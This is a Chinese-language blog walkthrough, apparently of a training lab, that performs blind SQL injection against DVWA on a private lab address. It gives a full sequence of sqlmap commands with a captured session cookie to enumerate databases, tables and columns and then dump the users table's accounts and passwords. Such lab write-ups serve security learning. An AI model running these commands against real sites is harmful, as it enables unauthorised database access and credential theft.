MySQL 盲隱碼攻擊

 MySQL 盲隱碼攻擊


前一篇進行了 MSSQL 的隱碼攻擊,接下來要進行 MySQL 的盲隱碼攻擊

攻擊目標 : http://10.10.10.16/dvwa,使用者帳號 admin 密碼 password,先進行登入



此為測試攻擊的網站故先將網站安全等級調整至 low




先做 SQL Injection (Blind) 的測試,輸入 1 送出如下圖

可以看到沒有顯示任何結果



網址如下

http://10.10.10.16/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#




透過同樣手法先拿取 cookie 值

security=low; PHPSESSID=4q95hhrnvro25i0s0q48dau032



開始 sqlmap 查是否可以 SQL Injection

指令 : sqlmap -u "http://10.10.10.16/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=4q95hhrnvro25i0s0q48dau032"



開始執行資料庫列舉 --dbs

指令 : sqlmap -u "http://10.10.10.16/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=4q95hhrnvro25i0s0q48dau032" --dbs

看到 6 個可用的資料庫,使用本攻擊範例資料庫 dvwa



下一步列舉資料表

指令 : sqlmap -u "http://10.10.10.16/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=4q95hhrnvro25i0s0q48dau032" -D dvwa --tables

兩張資料表 guestbook / users,有興趣的一定是 users



下一步列舉資料表 users 的欄位

指令 : sqlmap -u "http://10.10.10.16/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=4q95hhrnvro25i0s0q48dau032" -D dvwa -T users --columns

8 個欄位如下,這裡直接明碼顯示所以無需參數 --technique=B (加了結果一樣)


進行傾印

指令 : sqlmap -u "http://10.10.10.16/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=4q95hhrnvro25i0s0q48dau032" -D dvwa -T users --dump

所有帳號密碼又出來了~~~







留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

Challenge 0 - Secura(1)

Challenge 8 - Poseidon(0)